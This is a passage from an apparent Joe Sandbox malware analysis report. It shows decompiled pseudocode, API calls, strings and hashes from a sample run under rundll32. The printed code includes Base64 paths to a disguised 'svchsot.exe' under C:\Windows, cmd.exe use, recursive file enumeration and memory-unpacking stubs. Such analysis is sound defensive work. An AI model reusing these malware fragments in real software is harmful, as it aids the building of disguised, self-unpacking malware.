						Sleep(0x3e8);
						_t29 = E100290F2(_t27, _t38, _t54, _a8, _a8) & 0x00000085;
						 *(_t55 + _t29 * 2 - 0x80) =  *(_t55 + _t29 * 2 - 0x80) << 0xa5;
						asm("cld");
						asm("invalid");
						 *_t29 =  *_t29 + 1;
						__eflags =  *_t29;
						_t43 = 0x40;
						__eflags = 0;
						_t31 = memset( &_v263, 0, _t43 << 2);
						asm("stosw");
						asm("stosb");
						0x10041377();
						wsprintfA( &_v264, "%s.%d", _a8, _t31);
						return  *_t38(_a8,  &_v264, 1);
					}
					_push("self");
					L4:
					_push(0);
					return L10004139(_t39, _t47, _t59, _t60);
				}
				_push(_t52);
				goto L4;
			}

0x10004351
0x10004351
0x10004351
0x1000435c
0x10004367
0x1000436c
0x1000436e
0x10004379
0x1000437c
0x10004394
0x1000439f
0x100043a6
0x100043a8
0x100043ae
0x100043b3
0x100043b4
0x100043b9
0x100043bb
0x100043c4
0x100043c9
0x100043d9
0x100043de
0x100043e5
0x100043ef
0x100043f1
0x100043f6
0x100043f7
0x100043f9
0x100043f9
0x100043fd
0x100043fe
0x10004406
0x10004408
0x1000440a
0x1000440b
0x10004421
0x00000000
0x10004436
0x1000437e
0x10004383
0x10004383
0x00000000
0x1000438b
0x10004370
0x00000000

APIs

Sleep.KERNEL32(?,00000000,00000000,?,cmd.exe,C:\Users\user\Desktop\12071239,751443E0,00000000), ref: 100043A6
Sleep.KERNEL32(000003E8), ref: 100043E5

Strings

cmd.exe, xrefs: 1000435C, 10004362, 10004370
QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==, xrefs: 100043BF
C:\Users\user\Desktop\12071239, xrefs: 10004361
QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==, xrefs: 100043A8, 100043AD, 100043CB
self, xrefs: 1000437E

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: C:\Users\user\Desktop\12071239$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$cmd.exe$self
API String ID: 3472027048-4004553475
Opcode ID: ce743051b1794b362fe0f2b971c97cdc6726bc3503be27e5a92855a4779c6d50
Instruction ID: b27527e00d161eb54cfb38a31ab8197fa4e33b6488c85d147b80e3c5571d821e
Opcode Fuzzy Hash: ce743051b1794b362fe0f2b971c97cdc6726bc3503be27e5a92855a4779c6d50
Instruction Fuzzy Hash: CF0126B64043547AFA11B778EC86F8F3B4CDF452E1F110422F94469089CEB9AA808665

Uniqueness

Uniqueness Score: -1.00%

Function 10005CF7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70
timeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10005CF7(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void _v267;
				char _v268;
				void* _t20;
				signed int _t26;
				signed int _t30;

				_t30 = 0x40;
				_v268 = 0;
				memset( &_v267, 0, _t30 << 2);
				asm("stosw");
				asm("stosb");
				E10003EF4( &_v268, "%s\\lang.ini", "C:\\Users\\alfons\\Desktop");
				if(E10003F72( &_v268) != 0) {
					_v8 = 0;
					_t20 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
					_t36 = _t20;
					if(_t20 == 0xffffffff) {
						goto L1;
					}
					E10004035(_t36, _a4, _a8,  &_v8, 0);
					E10003F92(_t36);
					if(E10003F7D(_a4, "http://") == 0) {
						goto L1;
					}
					_t26 = E10003F7D(_a4, "search");
					asm("sbb eax, eax");
					return  ~_t26 + 1;
				}
				L1:
				return 0;
			}

0x10005d07
0x10005d10
0x10005d1b
0x10005d1d
0x10005d1f
0x10005d2c
0x10005d42
0x10005d5e
0x10005d61
0x10005d66
0x10005d6e
0x00000000
0x00000000
0x10005d7c
0x10005d82
0x10005d99
0x00000000
0x00000000
0x10005da3
0x10005dab
0x00000000
0x10005dae
0x10005d44
0x00000000

APIs

Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76

Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61

Strings

C:\Users\user\Desktop, xrefs: 10005D16
%s\lang.ini, xrefs: 10005D26
search, xrefs: 10005D9B
http://, xrefs: 10005D87

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
String ID: %s\lang.ini$C:\Users\user\Desktop$http://$search
API String ID: 1721638100-3849684823
Opcode ID: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
Instruction ID: 8c54ec75ac406b03aa883dad07c62b5b690cd8483bd5bdce465cc98b2d904575
Opcode Fuzzy Hash: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
Instruction Fuzzy Hash: 971106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA71AFC44A60

Uniqueness

Uniqueness Score: -1.00%

Function 10005C4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10005C4C(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void _v267;
				char _v268;
				void* _t19;
				signed int _t24;
				signed int _t28;

				_t28 = 0x40;
				_v268 = 0;
				memset( &_v267, 0, _t28 << 2);
				asm("stosw");
				asm("stosb");
				E10003EF4( &_v268, "%s\\lang.ini", "C:\\Users\\alfons\\Desktop");
				if(E10003F72( &_v268) != 0) {
					_v8 = 0;
					_t19 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
					_t32 = _t19;
					if(_t19 == 0xffffffff) {
						goto L1;
					}
					E10004035(_t32, _a4, _a8,  &_v8, 0);
					E10003F92(_t32);
					_t24 = E10003F7D(_a4, "http://");
					asm("sbb eax, eax");
					return  ~( ~_t24);
				}
				L1:
				return 0;
			}

0x10005c5c
0x10005c65
0x10005c70
0x10005c72
0x10005c74
0x10005c81
0x10005c97
0x10005cb3
0x10005cb6
0x10005cbb
0x10005cc3
0x00000000
0x00000000
0x10005cd1
0x10005cd7
0x10005ce4
0x10005cee
0x00000000
0x10005cf0
0x10005c99
0x00000000

APIs

Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76

Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6

Strings

C:\Users\user\Desktop, xrefs: 10005C6B
%s\lang.ini, xrefs: 10005C7B
http://, xrefs: 10005CDC

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
String ID: %s\lang.ini$C:\Users\user\Desktop$http://
API String ID: 1721638100-2151592823
Opcode ID: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
Instruction ID: 384da5e59b1e856c45bbe6372d81ece75bf9070c03a2386a6f56754dbd155cb7
Opcode Fuzzy Hash: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
Instruction Fuzzy Hash: 601104769041197EFB21DAA4CC42FDB776CDB143C4F0085B1FA48B6080EA71AF844660

Uniqueness

Uniqueness Score: -1.00%

Function 10004630 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E10004630(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v275;
				char _v276;
				void _v535;
				char _v536;
				char _v812;
				signed char _v856;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t47;
				void* _t53;
				intOrPtr _t57;
				void* _t59;
				signed int _t66;
				signed int _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t87;

				_t87 = __fp0;
				_t70 = __edx;
				_t66 = 0x40;
				_v536 = 0;
				memset( &_v535, 0, _t66 << 2);
				asm("stosw");
				asm("stosb");
				E1000CD0E(0,  &_v536);
				E1000CD08(0,  &_v536);
				_t80 = _t78 + 0x1c;
				_t47 =  &_v536;
				0x10031a18(_t47,  &_v856, "\\*.*", _a4);
				asm("insd");
				_v12 = _t47;
				if(_t47 != 0xffffffff) {
					_push(_t75);
					do {
						_t68 = 0x40;
						_t73 =  &_v275;
						_v276 = 0;
						memset(_t73, 0, _t68 << 2);
						_t74 = _t73 + _t68;
						asm("stosw");
						asm("stosb");
						wsprintfA( &_v276, "%s\\%s", _a4,  &_v812);
						_push(_a12);
						_t53 = E1000CD02(0, _t75);
						_t80 = _t80 + 0x20;
						_t75 = _t77 + _t53 - 0x10f;
						if((_v856 & 0x00000010) == 0) {
							_v16 = 0;
							_v8 = 0;
							_t57 = E10004564(0, _t70, __eflags, _t87,  &_v8,  &_v276,  &_v16);
							_t80 = _t80 + 0xc;
							__eflags = _t57;
							if(__eflags == 0) {
								goto L9;
							}
							__eflags = _v8;
							if(__eflags == 0) {
								goto L9;
							}
							E1000CBDC(_a8, _t75, _v8, _v16);
							E1000CCA8(0, 0, _t70, _t74, _t75, _t77, __eflags, _t87, _v8);
							L8:
							_t80 = _t80 + 0x14;
							goto L9;
						}
						_t85 = _v812 - 0x2e;
						if(_v812 == 0x2e) {
							goto L9;
						}
						E1000CBF7(_a8, _t75);
						E10004630(_t70, _t85, _t87,  &_v276, _a8, _a12);
						goto L8;
						L9:
						_push( &_v856);
						_push(_v12);
						_t59 = E100272CF(0, 0, _t70, _t74, _t75, _t77, _t85);
						asm("clc");
					} while (_t59 != 0);
					0x10035c27(_t74, _v12);
					return _t59;
				}
				return _t47;
			}

0x10004630
0x10004630
0x1000463f
0x10004648
0x1000464e
0x10004653
0x10004655
0x1000465d
0x1000466e
0x10004673
0x1000467d
0x10004684
0x10004689
0x1000468d
0x10004690
0x10004696
0x10004697
0x1000469b
0x1000469c
0x100046a2
0x100046a8
0x100046a8
0x100046aa
0x100046ac
0x100046c3
0x100046c9
0x100046cc
0x100046d1
0x100046d4
0x100046e2
0x1000470d
0x1000471c
0x1000471f
0x10004724
0x10004727
0x10004729
0x00000000
0x00000000
0x1000472b
0x1000472e
0x00000000
0x00000000
0x1000473a
0x10004742
0x10004747
0x10004747
0x00000000
0x10004747
0x100046e4
0x100046eb
0x00000000
0x00000000
0x100046f1
0x10004703
0x00000000
0x1000474a
0x10004750
0x10004751
0x10004754
0x10004759
0x1000475a
0x10004766
0x00000000
0x1000476b
0x1000476f

APIs

wsprintfA.USER32 ref: 100046C3

Strings

., xrefs: 100046E4
\*.*, xrefs: 10004668
%s\%s, xrefs: 100046BD

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: wsprintf
String ID: %s\%s$.$\*.*
API String ID: 2111968516-2210278135
Opcode ID: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
Instruction ID: d326f81f7ac9fe77124f283db77ffe5160f1302aaf38353be2e3603f90d865f5
Opcode Fuzzy Hash: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
Instruction Fuzzy Hash: F0316FB6C0025CBAEF12DFA4CC45EDE7B7CEB09280F1104A6F618A6051DB319B989B51

Uniqueness

Uniqueness Score: -1.00%

Function 10005F98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
timeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10005F98(void* __ecx, intOrPtr _a4) {
				char _v8;
				char _v268;
				void* __esi;
				void* _t15;

				E10003EF4( &_v268, "%s\\lang.ini", "C:\\Users\\alfons\\Desktop");
				_v8 = 0;
				_t19 = E10004015( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t10 != 0xffffffff) {
					_push(0);
					E10003F9D(_t19, _a4, E1000CD02(__ecx, 0), _a4,  &_v8);
					E10003F92(_t19);
					_t15 = 1;
					return _t15;
				}
				return 0;
			}

0x10005fb4
0x10005fd1
0x10005fd9
0x10005fe1
0x10005fea
0x10005ffa
0x10006000
0x1000600a
0x00000000
0x1000600a
0x00000000

APIs

Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FD4

Part of subcall function 10004015: CreateFileA.KERNEL32(00000080,00000003,00000000,00000000,80000000,?,10005CBB,?,10005CBB,?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 1000402D

Strings

C:\Users\user\Desktop, xrefs: 10005FA3
%s\lang.ini, xrefs: 10005FAE

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CreateTimer$Concurrency::details::platform::__FileQueue
String ID: %s\lang.ini$C:\Users\user\Desktop
API String ID: 3486561800-3123256004
Opcode ID: 886d66d81c6c89a48981e832452a30d3b73e07841e03f775c6b280e2ad27018c
Instruction ID: fdba07edcaf4c5d9f8880ce60f62221f71be709bcd2a0296a9a45e1c288e65da
Opcode Fuzzy Hash: 886d66d81c6c89a48981e832452a30d3b73e07841e03f775c6b280e2ad27018c
Instruction Fuzzy Hash: A5F0F6768011187AE621D6659C0BFEF3E6CDF857E0F104121FA48E90C5EB75AAC196E1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5656, Parent PID: 468COMMON

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	50
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 030B0CDD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,ABAD1000,00001000,00000040,030B1600,?,?,?,?), ref: 030B0D5C
wsprintfA.USER32(?,?,?,?), ref: 030B0E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 030B0E18
ExitProcess.KERNEL32(00000000), ref: 030B0E20

Strings

SWVU, xrefs: 030B0D64, 030B0D78, 030B0D7E, 030B0D84, 030B0DA1
The procedure %s could not be located in the DLL %s., xrefs: 030B0DF8

Memory Dump Source

Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd

Similarity

API ID: AllocExitMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 1926473177-4208015514
Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction ID: ec36d31ef7f9ba4542863cf35e413820390993ef5a93c94c95cfe65b892c6393
Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction Fuzzy Hash: 3C416A362427069FEB38DF14CC84BEB73B5EF84351F044619EE56AB684EB70B8108B90

Uniqueness

Uniqueness Score: -1.00%

Function 030B0C61 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32(?,?,?,?), ref: 030B0E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 030B0E18
ExitProcess.KERNEL32(00000000), ref: 030B0E20
VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 030B0E69

Strings

SWVU, xrefs: 030B0D78, 030B0D7E, 030B0D84, 030B0DA1
The procedure %s could not be located in the DLL %s., xrefs: 030B0DF8

Memory Dump Source

Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd

Similarity

API ID: ExitFreeMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 789587083-4208015514
Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction ID: c56e382423d9a024aee3f23a2878fe9272b7b1cf0e8de93b32a1e0022680ae73
Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction Fuzzy Hash: 9831BE362463869FEB39CF10CC94FEB77B8AF45254F080159ED568B285EF30A414CB60

Uniqueness

Uniqueness Score: -1.00%

Function 030B14A4 Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,00001000,00000004,?,?), ref: 030B14D3
VirtualProtect.KERNELBASE(?,00001000,?,?), ref: 030B14F1

Memory Dump Source

Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction ID: 330c60cf30274680802b404af0cfe9fa6d0429198abb81237553a04804aba2e2
Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction Fuzzy Hash: 0CF0E933240245AFEB1D8FA4D895EEE7768DF48398B20016AF6029A586CA71E651C754

Uniqueness

Uniqueness Score: -1.00%

Function 030B0063 Relevance: 2.6, APIs: 2, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 030B007E
VirtualFree.KERNELBASE(00000000,?,00004000), ref: 030B00BE

Memory Dump Source

Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction ID: 0c65109a8f6b77a2514677ca00643d3c0896abb5b8aa3064cf9fed470a484c08
Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction Fuzzy Hash: C601A47621A7027EF7718AA19C00F77BBECDF48612F184C5AFAD5C5090DA25E4408B70

Uniqueness

Uniqueness Score: -1.00%

Function 030B002A Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000), ref: 030B00BE

Memory Dump Source

Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction ID: c4f09e107145750557cd88906cbcc8a71b21535eef00d3f318f20e8c6292cf11
Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction Fuzzy Hash: EEF0E92266B3116DF620E7347C44AA7BBB8EB42221F150E97DD40D6091DE11D80286A4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 4620, Parent PID: 2436COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	2

Executed Functions

Function 04830CDD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,04831600,?,?,?,?), ref: 04830D5C
wsprintfA.USER32(?,?,?,?), ref: 04830E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 04830E18
ExitProcess.KERNEL32(00000000), ref: 04830E20

Strings

The procedure %s could not be located in the DLL %s., xrefs: 04830DF8
SWVU, xrefs: 04830D64, 04830D78, 04830D7E, 04830D84, 04830DA1

Memory Dump Source

Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd

Similarity

API ID: AllocExitMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 1926473177-4208015514
Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction ID: d2ffbc11ebc567067e9f6d5294d8b74cc62c7761470f6b32cbd49571dff4ab4b
Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction Fuzzy Hash: 5D418E3264170A9FEB34DF18CC84FEB73A5AF45756F044618ED4697649EB70B8108B91

Uniqueness

Uniqueness Score: -1.00%

Function 04830C61 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32(?,?,?,?), ref: 04830E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 04830E18
ExitProcess.KERNEL32(00000000), ref: 04830E20
VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 04830E69

Strings

The procedure %s could not be located in the DLL %s., xrefs: 04830DF8
SWVU, xrefs: 04830D78, 04830D7E, 04830D84, 04830DA1

Memory Dump Source

Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd

Similarity

API ID: ExitFreeMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 789587083-4208015514
Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction ID: a4da2b924ad042dff14586c1f5c67b66ca41bf3552c1488c1f05237b357ddaf2
Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction Fuzzy Hash: 9131CF3260534A9FEB399F14CC84FEB77A8AF46356F040619ED42C7289EB30B410CB91

Uniqueness

Uniqueness Score: -1.00%

Function 048314A4 Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 048314D3
VirtualProtect.KERNEL32(?,00001000,?,?), ref: 048314F1

Memory Dump Source

Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction ID: 3fe6049c16b5b2982c1eee51ff601989f5fd221399f47aa146204e27cf95f26e
Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction Fuzzy Hash: 1CF0E933240245AFEB198FA4D885EEE7768DF48398B20056AF6029A186CA71E551C754

Uniqueness

Uniqueness Score: -1.00%

Function 04830063 Relevance: 2.6, APIs: 2, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0483007E
VirtualFree.KERNELBASE(00000000,?,00004000), ref: 048300BE

Memory Dump Source

Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction ID: 41c2d749e4c54b1b8d3d197351cab71360d168c419536ca0d85305b6dd314b9f
Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction Fuzzy Hash: 1601F4722096017EE7319BA19C50F37BBDCDF09316F044C5AFAD5C5090D921F4408BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0483002A Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000), ref: 048300BE

Memory Dump Source

Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction ID: c0b09dcc072dce1ebefa3c6e220d826b3c38dd760ab2de44487389614695c220
Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
